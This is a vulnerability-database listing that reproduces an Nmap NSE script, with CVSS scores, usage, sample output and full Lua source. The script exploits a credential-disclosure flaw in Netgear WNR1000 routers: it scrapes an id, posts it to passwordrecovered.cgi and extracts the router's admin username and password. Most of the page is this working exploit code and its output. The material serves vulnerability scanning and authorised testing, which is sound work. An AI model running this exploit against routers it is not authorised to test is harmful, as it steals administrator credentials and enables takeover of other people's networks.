Lucene search

K
nmapPaul AMAR <[email protected]>, Rob NichollsNMAP:HTTP-VULN-WNR1000-CREDS.NSE
HistoryMay 04, 2014 - 3:43 p.m.

http-vuln-wnr1000-creds NSE Script

2014-05-0415:43:30
Paul AMAR <[email protected]>, Rob Nicholls
nmap.org
56

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA

Vulnerability discovered by c1ph04.

Script Arguments

http-vuln-wnr1000-creds.uri

URI path where the passwordrecovered.cgi script can be found. Default: /

creds.[service], creds.global

See the documentation for the creds library.

vulns.short, vulns.showall

See the documentation for the vulns library.

slaxml.debug

See the documentation for the slaxml library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

Example Usage

nmap -sV --script http-vuln-wnr1000-creds &lt;target&gt; -p80

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-wnr1000-creds:
|   VULNERABLE:
|   Netgear WNR1000v3 Credential Harvesting Exploit
|     State: VULNERABLE (Exploitable)
|     IDs:  None, 0-day
|     Description:
|       A vulnerability has been discovered in WNR 1000 series that allows an attacker
|       to retrieve administrator credentials with the router interface.
|       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
|     Disclosure date: 26-01-2014
|     References:
|_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip

Requires


local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local creds = require "creds"

description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker
to retrieve administrator credentials with the router interface.
Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA

Vulnerability discovered by c1ph04.
]]

---
-- @usage
-- nmap -sV --script http-vuln-wnr1000-creds <target> -p80
-- @args http-vuln-wnr1000-creds.uri URI path where the passwordrecovered.cgi script can be found. Default: /
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-wnr1000-creds:
-- |   VULNERABLE:
-- |   Netgear WNR1000v3 Credential Harvesting Exploit
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  None, 0-day
-- |     Description:
-- |       A vulnerability has been discovered in WNR 1000 series that allows an attacker
-- |       to retrieve administrator credentials with the router interface.
-- |       Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
-- |     Disclosure date: 26-01-2014
-- |     References:
-- |_      http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
--
---

author = {"Paul AMAR <[email protected]>", "Rob Nicholls"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}

portrule = shortport.http

-- function to escape specific characters
local escape = function(str) return string.gsub(str, "", "") end

action = function(host, port)
    local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"

    local vuln = {
        title = 'Netgear WNR1000v3 Credential Harvesting Exploit',
        state = vulns.STATE.NOT_VULN, -- default
        description = [[
            A vulnerability has been discovered in WNR 1000 series that allows an attacker
            to retrieve administrator credentials with the router interface.
            Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA.
            Vulnerability discovered by c1ph04.
            ]],
        references = {
            'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html',
        },
        dates = {
            disclosure = {year = '2014', month = '01', day = '26'},
        },
    }

    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

    local detection_session = http.get(host, port, uri)

    if detection_session.status then
      if not detection_session.body then
        stdnse.debug1("No response body")
        return vuln_report:make_output(vuln)
      end
        -- gather the id
        local id_netgear = string.match(escape(detection_session.body), ('(id=%d+)'))

        if id_netgear == nil then
          stdnse.debug1("Unable to obtain the id")
          return vuln_report:make_output(vuln)
        else
            -- send the payload to get username and password
            local payload_session = http.post(host, port, uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "")
            if payload_session then
                local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin')
                local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText')
                if (netgear_username ~= nil and netgear_password ~= nil) then
                  vuln.exploit_results = {
                    ("username: %s"):format(netgear_username),
                    ("password: %s"):format(netgear_password),
                  }
                  local c = creds.Credentials:new(SCRIPT_NAME, host, port)
                  c:add(netgear_username, netgear_password, creds.State.VALID)
                  vuln.state = vulns.STATE.VULN
                else
                    stdnse.debug1("We haven't been able to get username/password")
                end
            end
        end
    end
    return vuln_report:make_output(vuln)
end

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

0.973 High

EPSS

Percentile

99.8%

Related for NMAP:HTTP-VULN-WNR1000-CREDS.NSE